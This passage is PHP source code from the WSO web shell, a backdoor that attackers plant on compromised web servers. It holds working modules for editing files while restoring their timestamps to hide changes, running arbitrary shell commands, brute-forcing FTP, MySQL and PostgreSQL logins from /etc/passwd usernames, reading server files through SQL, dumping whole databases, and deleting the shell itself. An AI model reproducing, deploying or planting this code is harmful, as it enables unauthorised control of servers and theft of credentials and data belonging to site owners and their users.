urlencode($_POST[\'p1\']) . \'\\\',null,this.chmod.value);return false;"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\n\r\t\t\tbreak;\n\r\t\tcase \'edit\':\n\r\t\t\tif( !is_writable($_POST[\'p1\'])) {\n\r\t\t\t\techo \'File isn\\\'t writeable\';\n\r\t\t\t\tbreak;\n\r\t\t\t}\n\r\t\t\tif( !empty($_POST[\'p3\']) ) {\n\r\t\t\t\t$time = @filemtime($_POST[\'p1\']);\n\r\t\t\t\t$_POST[\'p3\'] = substr($_POST[\'p3\'],1);\n\r\t\t\t\t$fp = @fopen($_POST[\'p1\'],"w");\n\r\t\t\t\tif($fp) {\n\r\t\t\t\t\t@fwrite($fp,$_POST[\'p3\']);\n\r\t\t\t\t\t@fclose($fp);\n\r\t\t\t\t\techo \'Saved!<br><script>p3_="";</script>\';\n\r\t\t\t\t\t@touch($_POST[\'p1\'],$time,$time);\n\r\t\t\t\t}\n\r\t\t\t}\n\r\t\t\techo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,\\\'1\\\'+this.text.value);return false;"><textarea name=text class=bigarea>\';\n\r\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\n\r\t\t\tif($fp) {\n\r\t\t\t\twhile( !@feof($fp) )\n\r\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\n\r\t\t\t\t@fclose($fp);\n\r\t\t\t}\n\r\t\t\techo \'</textarea><input type=submit value=">>"></form>\';\n\r\t\t\tbreak;\n\r\t\tcase \'hexdump\':\n\r\t\t\t$c = @file_get_contents($_POST[\'p1\']);\n\r\t\t\t$n = 0;\n\r\t\t\t$h = array(\'00000000<br>\',\'\',\'\');\n\r\t\t\t$len = strlen($c);\n\r\t\t\tfor ($i=0; $i<$len; ++$i) {\n\r\t\t\t\t$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\n\r\t\t\t\tswitch ( ord($c[$i]) ) {\n\r\t\t\t\t\tcase 0:  $h[2] .= \' \'; break;\n\r\t\t\t\t\tcase 9:  $h[2] .= \' \'; break;\n\r\t\t\t\t\tcase 10: $h[2] .= \' \'; break;\n\r\t\t\t\t\tcase 13: $h[2] .= \' \'; break;\n\r\t\t\t\t\tdefault: $h[2] .= $c[$i]; break;\n\r\t\t\t\t}\n\r\t\t\t\t$n++;\n\r\t\t\t\tif ($n == 32) {\n\r\t\t\t\t\t$n = 0;\n\r\t\t\t\t\tif ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';}\n\r\t\t\t\t\t$h[1] .= \'<br>\';\n\r\t\t\t\t\t$h[2] .= "\\n";\n\r\t\t\t\t}\n\r\t\t \t}\n\r\t\t\techo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\n\r\t\t\tbreak;\n\r\t\tcase \'rename\':\n\r\t\t\tif( !empty($_POST[\'p3\']) ) {\n\r\t\t\t\tif(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\n\r\t\t\t\t\techo \'Can\\\'t rename!<br>\';\n\r\t\t\t\telse\n\r\t\t\t\t\tdie(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\n\r\t\t\t}\n\r\t\t\techo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.name.value);return false;"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\n\r\t\t\tbreak;\n\r\t\tcase \'touch\':\n\r\t\t\tif( !empty($_POST[\'p3\']) ) {\n\r\t\t\t\t$time = strtotime($_POST[\'p3\']);\n\r\t\t\t\tif($time) {\n\r\t\t\t\t\tif(!touch($_POST[\'p1\'],$time,$time))\n\r\t\t\t\t\t\techo \'Fail!\';\n\r\t\t\t\t\telse\n\r\t\t\t\t\t\techo \'Touched!\';\n\r\t\t\t\t} else echo \'Bad time format!\';\n\r\t\t\t}\n\r\t\t\tclearstatcache();\n\r\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.touch.value);return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\n\r\t\t\tbreak;\n\r\t}\n\r\techo \'</div>\';\n\r\twsoFooter();\n\r}\n\r\n\rfunction actionConsole() {\n\r    if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {\n\r        WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true);\n\r        $_POST[\'p1\'] .= \' 2>&1\';\n\r    } elseif(!empty($_POST[\'p1\']))\n\r        WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0);\n\r\n\r\tif(isset($_POST[\'ajax\'])) {\n\r\t\tWSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\n\r\t\tob_start();\n\r\t\techo "d.cf.cmd.value=\'\';\\n";\n\r\t\t$temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".wsoEx($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\n\r\t\tif(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match))\t{\n\r\t\t\tif(@chdir($match[1])) {\n\r\t\t\t\t$GLOBALS[\'cwd\'] = @getcwd();\n\r\t\t\t\techo "c_=\'".$GLOBALS[\'cwd\']."\';";\n\r\t\t\t}\n\r\t\t}\n\r\t\techo "d.cf.output.value+=\'".$temp."\';";\n\r\t\techo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";\n\r\t\t$temp = ob_get_clean();\n\r\t\techo strlen($temp), "\\n", $temp;\n\r\t\texit;\n\r\t}\n\r    if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\n\r\t\tWSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\n\r\twsoHeader();\n\r    echo "<script>\n\rif(window.Event) window.captureEvents(Event.KEYDOWN);\n\rvar cmds = new Array(\'\');\n\rvar cur = 0;\n\rfunction kp(e) {\n\r\tvar n = (window.Event) ? e.which : e.keyCode;\n\r\tif(n == 38) {\n\r\t\tcur--;\n\r\t\tif(cur>=0)\n\r\t\t\tdocument.cf.cmd.value = cmds[cur];\n\r\t\telse\n\r\t\t\tcur++;\n\r\t} else if(n == 40) {\n\r\t\tcur++;\n\r\t\tif(cur < cmds.length)\n\r\t\t\tdocument.cf.cmd.value = cmds[cur];\n\r\t\telse\n\r\t\t\tcur--;\n\r\t}\n\r}\n\rfunction add(cmd) {\n\r\tcmds.pop();\n\r\tcmds.push(cmd);\n\r\tcmds.push(\'\');\n\r\tcur = cmds.length-1;\n\r}\n\r</script>";\n\r\techo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\\\'clear\\\'){d.cf.output.value=\\\'\\\';d.cf.cmd.value=\\\'\\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');} return false;"><select name=alias>\';\n\r\tforeach($GLOBALS[\'aliases\'] as $n => $v) {\n\r\t\tif($v == \'\') {\n\r\t\t\techo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\n\r\t\t\tcontinue;\n\r\t\t}\n\r\t\techo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\n\r\t}\n\r\t\n\r\techo \'</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 > send using AJAX <input type=checkbox name=show_errors value=1 \'.(!empty($_POST[\'p2\'])||$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']?\'checked\':\'\').\'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>\';\n\r\tif(!empty($_POST[\'p1\'])) {\n\r\t\techo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".wsoEx($_POST[\'p1\']));\n\r\t}\n\r\techo \'</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>\';\n\r\techo \'</form></div><script>d.cf.cmd.focus();</script>\';\n\r\twsoFooter();\n\r}\n\r\n\rfunction actionLogout() {\n\r    setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);\n\r\tdie(\'bye!\');\n\r}\n\r\n\rfunction actionSelfRemove() {\n\r\n\r\tif($_POST[\'p1\'] == \'yes\')\n\r\t\tif(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\n\r\t\t\tdie(\'Shell has been removed\');\n\r\t\telse\n\r\t\t\techo \'unlink error!\';\n\r    if($_POST[\'p1\'] != \'yes\')\n\r        wsoHeader();\n\r\techo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\n\r\twsoFooter();\n\r}\n\r\n\rfunction actionBruteforce() {\n\r\twsoHeader();\n\r\tif( isset($_POST[\'proto\']) ) {\n\r\t\techo \'<h1>Results</h1><div class=content><span>Type:</span> \'.htmlspecialchars($_POST[\'proto\']).\' <span>Server:</span> \'.htmlspecialchars($_POST[\'server\']).\'<br>\';\n\r\t\tif( $_POST[\'proto\'] == \'ftp\' ) {\n\r\t\t\tfunction wsoBruteForce($ip,$port,$login,$pass) {\n\r\t\t\t\t$fp = @ftp_connect($ip, $port?$port:21);\n\r\t\t\t\tif(!$fp) return false;\n\r\t\t\t\t$res = @ftp_login($fp, $login, $pass);\n\r\t\t\t\t@ftp_close($fp);\n\r\t\t\t\treturn $res;\n\r\t\t\t}\n\r\t\t} elseif( $_POST[\'proto\'] == \'mysql\' ) {\n\r\t\t\tfunction wsoBruteForce($ip,$port,$login,$pass) {\n\r\t\t\t\t$res = @mysql_connect($ip.\':\'.($port?$port:3306), $login, $pass);\n\r\t\t\t\t@mysql_close($res);\n\r\t\t\t\treturn $res;\n\r\t\t\t}\n\r\t\t} elseif( $_POST[\'proto\'] == \'pgsql\' ) {\n\r\t\t\tfunction wsoBruteForce($ip,$port,$login,$pass) {\n\r\t\t\t\t$str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres";\n\r\t\t\t\t$res = @pg_connect($str);\n\r\t\t\t\t@pg_close($res);\n\r\t\t\t\treturn $res;\n\r\t\t\t}\n\r\t\t}\n\r\t\t$success = 0;\n\r\t\t$attempts = 0;\n\r\t\t$server = explode(":", $_POST[\'server\']);\n\r\t\tif($_POST[\'type\'] == 1) {\n\r\t\t\t$temp = @file(\'/etc/passwd\');\n\r\t\t\tif( is_array($temp) )\n\r\t\t\t\tforeach($temp as $line) {\n\r\t\t\t\t\t$line = explode(":", $line);\n\r\t\t\t\t\t++$attempts;\n\r\t\t\t\t\tif( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {\n\r\t\t\t\t\t\t$success++;\n\r\t\t\t\t\t\techo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($line[0]).\'<br>\';\n\r\t\t\t\t\t}\n\r\t\t\t\t\tif(@$_POST[\'reverse\']) {\n\r\t\t\t\t\t\t$tmp = "";\n\r\t\t\t\t\t\tfor($i=strlen($line[0])-1; $i>=0; --$i)\n\r\t\t\t\t\t\t\t$tmp .= $line[0][$i];\n\r\t\t\t\t\t\t++$attempts;\n\r\t\t\t\t\t\tif( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {\n\r\t\t\t\t\t\t\t$success++;\n\r\t\t\t\t\t\t\techo \'<b>\'.htmlspecialchars($line[0]).\'</b>:\'.htmlspecialchars($tmp);\n\r\t\t\t\t\t\t}\n\r\t\t\t\t\t}\n\r\t\t\t\t}\n\r\t\t} elseif($_POST[\'type\'] == 2) {\n\r\t\t\t$temp = @file($_POST[\'dict\']);\n\r\t\t\tif( is_array($temp) )\n\r\t\t\t\tforeach($temp as $line) {\n\r\t\t\t\t\t$line = trim($line);\n\r\t\t\t\t\t++$attempts;\n\r\t\t\t\t\tif( wsoBruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) {\n\r\t\t\t\t\t\t$success++;\n\r\t\t\t\t\t\techo \'<b>\'.htmlspecialchars($_POST[\'login\']).\'</b>:\'.htmlspecialchars($line).\'<br>\';\n\r\t\t\t\t\t}\n\r\t\t\t\t}\n\r\t\t}\n\r\t\techo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";\n\r\t}\n\r\techo \'<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>\'\n\r\t\t.\'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>\'\n\r\t\t.\'<input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\'\n\r\t\t.\'<input type=hidden name=a value="\'.htmlspecialchars($_POST[\'a\']).\'">\'\n\r\t\t.\'<input type=hidden name=charset value="\'.htmlspecialchars($_POST[\'charset\']).\'">\'\n\r\t\t.\'<span>Server:port</span></td>\'\n\r\t\t.\'<td><input type=text name=server value="127.0.0.1"></td></tr>\'\n\r\t\t.\'<tr><td><span>Brute type</span></td>\'\n\r\t\t.\'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>\'\n\r\t\t.\'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>\'\n\r\t\t.\'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>\'\n\r\t\t.\'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>\'\n\r\t\t.\'<td><input type=text name=login value="root"></td></tr>\'\n\r\t\t.\'<tr><td><span>Dictionary</span></td>\'\n\r\t\t.\'<td><input type=text name=dict value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'passwd.dic"></td></tr></table>\'\n\r\t\t.\'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>\';\n\r\techo \'</div><br>\';\n\r\twsoFooter();\n\r}\n\r\n\rfunction actionSql() {\n\r\tclass DbClass {\n\r\t\tvar $type;\n\r\t\tvar $link;\n\r\t\tvar $res;\n\r\t\tfunction DbClass($type)\t{\n\r\t\t\t$this->type = $type;\n\r\t\t}\n\r\t\tfunction connect($host, $user, $pass, $dbname){\n\r\t\t\tswitch($this->type)\t{\n\r\t\t\t\tcase \'mysql\':\n\r\t\t\t\t\tif( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\n\r\t\t\t\t\tbreak;\n\r\t\t\t\tcase \'pgsql\':\n\r\t\t\t\t\t$host = explode(\':\', $host);\n\r\t\t\t\t\tif(!$host[1]) $host[1]=5432;\n\r\t\t\t\t\tif( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\n\r\t\t\t\t\tbreak;\n\r\t\t\t}\n\r\t\t\treturn false;\n\r\t\t}\n\r\t\tfunction selectdb($db) {\n\r\t\t\tswitch($this->type)\t{\n\r\t\t\t\tcase \'mysql\':\n\r\t\t\t\t\tif (@mysql_select_db($db))return true;\n\r\t\t\t\t\tbreak;\n\r\t\t\t}\n\r\t\t\treturn false;\n\r\t\t}\n\r\t\tfunction query($str) {\n\r\t\t\tswitch($this->type) {\n\r\t\t\t\tcase \'mysql\':\n\r\t\t\t\t\treturn $this->res = @mysql_query($str);\n\r\t\t\t\t\tbreak;\n\r\t\t\t\tcase \'pgsql\':\n\r\t\t\t\t\treturn $this->res = @pg_query($this->link,$str);\n\r\t\t\t\t\tbreak;\n\r\t\t\t}\n\r\t\t\treturn false;\n\r\t\t}\n\r\t\tfunction fetch() {\n\r\t\t\t$res = func_num_args()?func_get_arg(0):$this->res;\n\r\t\t\tswitch($this->type)\t{\n\r\t\t\t\tcase \'mysql\':\n\r\t\t\t\t\treturn @mysql_fetch_assoc($res);\n\r\t\t\t\t\tbreak;\n\r\t\t\t\tcase \'pgsql\':\n\r\t\t\t\t\treturn @pg_fetch_assoc($res);\n\r\t\t\t\t\tbreak;\n\r\t\t\t}\n\r\t\t\treturn false;\n\r\t\t}\n\r\t\tfunction listDbs() {\n\r\t\t\tswitch($this->type)\t{\n\r\t\t\t\tcase \'mysql\':\n\r                        return $this->query("SHOW databases");\n\r\t\t\t\tbreak;\n\r\t\t\t\tcase \'pgsql\':\n\r\t\t\t\t\treturn $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");\n\r\t\t\t\tbreak;\n\r\t\t\t}\n\r\t\t\treturn false;\n\r\t\t}\n\r\t\tfunction listTables() {\n\r\t\t\tswitch($this->type)\t{\n\r\t\t\t\tcase \'mysql\':\n\r\t\t\t\t\treturn $this->res = $this->query(\'SHOW TABLES\');\n\r\t\t\t\tbreak;\n\r\t\t\t\tcase \'pgsql\':\n\r\t\t\t\t\treturn $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");\n\r\t\t\t\tbreak;\n\r\t\t\t}\n\r\t\t\treturn false;\n\r\t\t}\n\r\t\tfunction error() {\n\r\t\t\tswitch($this->type)\t{\n\r\t\t\t\tcase \'mysql\':\n\r\t\t\t\t\treturn @mysql_error();\n\r\t\t\t\tbreak;\n\r\t\t\t\tcase \'pgsql\':\n\r\t\t\t\t\treturn @pg_last_error();\n\r\t\t\t\tbreak;\n\r\t\t\t}\n\r\t\t\treturn false;\n\r\t\t}\n\r\t\tfunction setCharset($str) {\n\r\t\t\tswitch($this->type)\t{\n\r\t\t\t\tcase \'mysql\':\n\r\t\t\t\t\tif(function_exists(\'mysql_set_charset\'))\n\r\t\t\t\t\t\treturn @mysql_set_charset($str, $this->link);\n\r\t\t\t\t\telse\n\r\t\t\t\t\t\t$this->query(\'SET CHARSET \'.$str);\n\r\t\t\t\t\tbreak;\n\r\t\t\t\tcase \'pgsql\':\n\r\t\t\t\t\treturn @pg_set_client_encoding($this->link, $str);\n\r\t\t\t\t\tbreak;\n\r\t\t\t}\n\r\t\t\treturn false;\n\r\t\t}\n\r\t\tfunction loadFile($str) {\n\r\t\t\tswitch($this->type)\t{\n\r\t\t\t\tcase \'mysql\':\n\r\t\t\t\t\treturn $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));\n\r\t\t\t\tbreak;\n\r\t\t\t\tcase \'pgsql\':\n\r\t\t\t\t\t$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM \'".addslashes($str)."\';select file from wso2;");\n\r\t\t\t\t\t$r=array();\n\r\t\t\t\t\twhile($i=$this->fetch())\n\r\t\t\t\t\t\t$r[] = $i[\'file\'];\n\r\t\t\t\t\t$this->query(\'drop table wso2\');\n\r\t\t\t\t\treturn array(\'file\'=>implode("\\n",$r));\n\r\t\t\t\tbreak;\n\r\t\t\t}\n\r\t\t\treturn false;\n\r\t\t}\n\r\t\tfunction dump($table, $fp = false) {\n\r\t\t\tswitch($this->type)\t{\n\r\t\t\t\tcase \'mysql\':\n\r\t\t\t\t\t$res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\n\r\t\t\t\t\t$create = mysql_fetch_array($res);\n\r\t\t\t\t\t$sql = $create[1].";\\n";\n\r                    if($fp) fwrite($fp, $sql); else echo($sql);\n\r\t\t\t\t\t$this->query(\'SELECT * FROM `\'.$table.\'`\');\n\r                    $i = 0;\n\r                    $head = true;\n\r\t\t\t\t\twhile($item = $this->fetch()) {\n\r                        $sql = \'\';\n\r                        if($i % 1000 == 0) {\n\r                            $head = true;\n\r                            $sql = ";\\n\\n";\n\r                        }\n\r\n\r\t\t\t\t\t\t$columns = array();\n\r\t\t\t\t\t\tforeach($item as $k=>$v) {\n\r                            if($v === null)\n\r                                $item[$k] = "NULL";\n\r                            elseif(is_int($v))\n\r                                $item[$k] = $v;\n\r                            else\n\r                                $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\n\r\t\t\t\t\t\t\t$columns[] = "`".$k."`";\n\r\t\t\t\t\t\t}\n\r                        if($head) {\n\r                            $sql .= \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES \\n\\t(".implode(", ", $item).\')\';\n\r                            $head = false;\n\r                        } else\n\r                            $sql .= "\\n\\t,(".implode(", ", $item).\')\';\n\r                        if($fp) fwrite($fp, $sql); else echo($sql);\n\r                        $i++;\n\r\t\t\t\t\t}\n\r                    if(!$head)\n\r                        if($fp) fwrite($fp, ";\\n\\n"); else echo(";\\n\\n");\n\r\t\t\t\tbreak;\n\r\t\t\t\tcase \'pgsql\':\n\r\t\t\t\t\t$this->query(\'SELECT * FROM \'.$table);\n\r\t\t\t\t\twhile($item = $this->fetch()) {\n\r\t\t\t\t\t\t$columns = array();\n\r\t\t\t\t\t\tforeach($item as $k=>$v) {\n\r\t\t\t\t\t\t\t$item[$k] = "\'".addslashes($v)."\'";\n\r\t\t\t\t\t\t\t$columns[] = $k;\n\r\t\t\t\t\t\t}\n\r                        $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."\\n";\n\r                        if($fp) fwrite($fp, $sql); else echo($sql);\n\r\t\t\t\t\t}\n\r\t\t\t\tbreak;\n\r\t\t\t}\n\r\t\t\treturn false;\n\r\t\t}\n\r\t};\n\r\t$db = new DbClass($_POST[\'type\']);\n\r\tif((@$_POST[\'p2\']==\'download\') && (@$_POST[\'p1\']!=\'select\')) {\n\r\t\t$db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\n\r\t\t$db->selectdb($_POST[\'sql_base\']);\n\r        switch($_POST[\'charset\']) {\n\r            case "Windows-1251": $db->setCharset(\'cp1251\'); break;\n\r            case "UTF-8": $db->setCharset(\'utf8\'); break;\n\r            case "KOI8-R": $db->setCharset(\'koi8r\'); break;\n\r            case "KOI8-U": $db->setCharset(\'koi8u\'); break;\n\r            case "cp866": $db->setCharset(\'cp866\'); break;\n\r        }\n\r        if(empty($_POST[\'file\'])) {\n\r            ob_start("ob_gzhandler", 4096);\n\r            header("Content-Disposition: attachment; filename=dump.sql");\n\r            header("Content-Type: text/plain");\n\r            foreach($_POST[\'tbl\'] as $v)\n\r\t\t\t\t$db->dump($v);\n\r            exit;\n\r        } elseif($fp = @fopen($_POST[\'file\'], \'w\')) {\n\r            foreach($_POST[\'tbl\'] as $v)\n\r                $db->dump($v, $fp);\n\r            fclose($fp);\n\r            unset($_POST[\'p2\']);\n\r        } else\n\r            die(\'<script>alert("Error! Can\\\'t open file");window.history.back(-1)</script>\');\n\r\t}\n\r\twsoHeader();\n\r\techo "\n\r<h1>Sql browser</h1><div class=content>\n\r<form name=\'sf\' method=\'post\' onsubmit=\'fs(this);\'><table cellpadding=\'2\' cellspacing=\'0\'><tr>\n\r<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\n\r<input type=hidden name=a value=Sql><input type=hidden name=p1 value=\'query\'><input type=hidden name=p2 value=\'\'><input type=hidden name=c value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') ."\'>\n\r<td><select name=\'type\'><option value=\'mysql\' ";\n\r    if(@$_POST[\'type\']==\'mysql\')echo \'selected\';\n\recho ">MySql</option><option value=\'pgsql\' ";\n\rif(@$_POST[\'type\']==\'pgsql\')echo \'selected\';\n\recho ">PostgreSql</option></select></td>\n\r<td><input type=text name=sql_host value=\\"". (empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])) ."\\"></td>\n\r<td><input type=text name=sql_login value=\\"". (empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])) ."\\"></td>\n\r<td><input type=text name=sql_pass value=\\"". (empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])) ."\\"></td><td>";\n\r\t$tmp = "<input type=text name=sql_base value=\'\'>";\n\r\tif(isset($_POST[\'sql_host\'])){\n\r\t\tif($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {\n\r\t\t\tswitch($_POST[\'charset\']) {\n\r\t\t\t\tcase "Windows-1251": $db->setCharset(\'cp1251\'); break;\n\r\t\t\t\tcase "UTF-8": $db->setCharset(\'utf8\'); break;\n\r\t\t\t\tcase "KOI8-R": $db->setCharset(\'koi8r\'); break;\n\r\t\t\t\tcase "KOI8-U": $db->setCharset(\'koi8u\'); break;\n\r\t\t\t\tcase "cp866": $db->setCharset(\'cp866\'); break;\n\r\t\t\t}\n\r\t\t\t$db->listDbs();\n\r\t\t\techo "<select name=sql_base><option value=\'\'></option>";\n\r\t\t\twhile($item = $db->fetch()) {\n\r\t\t\t\tlist($key, $value) = each($item);\n\r\t\t\t\techo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\n\r\t\t\t}\n\r\t\t\techo \'</select>\';\n\r\t\t}\n\r\t\telse echo $tmp;\n\r\t}else\n\r\t\techo $tmp;\n\r\techo "</td>\n\r\t\t\t\t<td><input type=submit value=\'>>\' onclick=\'fs(d.sf);\'></td>\n\r                <td><input type=checkbox name=sql_count value=\'on\'" . (empty($_POST[\'sql_count\'])?\'\':\' checked\') . "> count the number of rows</td>\n\r\t\t\t</tr>\n\r\t\t</table>\n\r\t\t<script>\n\r            s_db=\'".@addslashes($_POST[\'sql_base\'])."\';\n\r            function fs(f) {\n\r                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\n\r                    if(f.p1) f.p1.value=\'\';\n\r                    if(f.p2) f.p2.value=\'\';\n\r                    if(f.p3) f.p3.value=\'\';\n\r                }\n\r            }\n\r\t\t\tfunction st(t,l) {\n\r\t\t\t\td.sf.p1.value = \'select\';\n\r\t\t\t\td.sf.p2.value = t;\n\r                if(l && d.sf.p3) d.sf.p3.value = l;\n\r\t\t\t\td.sf.submit();\n\r\t\t\t}\n\r\t\t\tfunction is() {\n\r\t\t\t\tfor(i=0;i<d.sf.elements[\'tbl[]\'].length;++i)\n\r\t\t\t\t\td.sf.elements[\'tbl[]\'][i].checked = !d.sf.elements[\'tbl[]\'][i].checked;\n\r\t\t\t}\n\r\t\t</script>";\n\r\tif(isset($db) && $db->link){\n\r\t\techo "<br/><table width=100% cellpadding=2 cellspacing=0>";\n\r\t\t\tif(!empty($_POST[\'sql_base\'])){\n\r\t\t\t\t$db->selectdb($_POST[\'sql_base\']);\n\r\t\t\t\techo "<tr><td width=1 style=\'border-top:2px solid #666;\'><span>Tables:</span><br><br>";\n\r\t\t\t\t$tbls_res = $db->listTables();\n\r\t\t\t\twhile($item = $db->fetch($tbls_res)) {\n\r\t\t\t\t\tlist($key, $value) = each($item);\n\r                    if(!empty($_POST[\'sql_count\']))\n\r                        $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\n\r\t\t\t\t\t$value = htmlspecialchars($value);\n\r\t\t\t\t\techo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;<a href=# onclick=\\"st(\'".$value."\',1)\\">".$value."</a>" . (empty($_POST[\'sql_count\'])?\'&nbsp;\':" <small>({$n[\'n\']})</small>") . "</nobr><br>";\n\r\t\t\t\t}\n\r\t\t\t\techo "<input type=\'checkbox\' onclick=\'is();\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";document.sf.submit();\'><br>File path:<input type=text name=file value=\'dump.sql\'></td><td style=\'border-top:2px solid #666;\'>";\n\r\t\t\t\tif(@$_POST[\'p1\'] == \'select\') {\n\r\t\t\t\t\t$_POST[\'p1\'] = \'query\';\n\r                    $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1;\n\r\t\t\t\t\t$db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']);\n\r\t\t\t\t\t$num = $db->fetch();\n\r\t\t\t\t\t$pages = ceil($num[\'n\'] / 30);\n\r                    echo "<script>d.sf.onsubmit=function(){st(\\"" . $_POST[\'p2\'] . "\\", d.sf.p3.value)}</script><span>".$_POST[\'p2\']."</span> ({$num[\'n\']} records) Page # <input type=text name=\'p3\' value=" . ((int)$_POST[\'p3\']) . ">";\n\r                    echo " of $pages";\n\r                    if($_POST[\'p3\'] > 1)\n\r                        echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']-1) . ")\'>&lt; Prev</a>";\n\r                    if($_POST[\'p3\'] < $pages)\n\r                        echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']+1) . 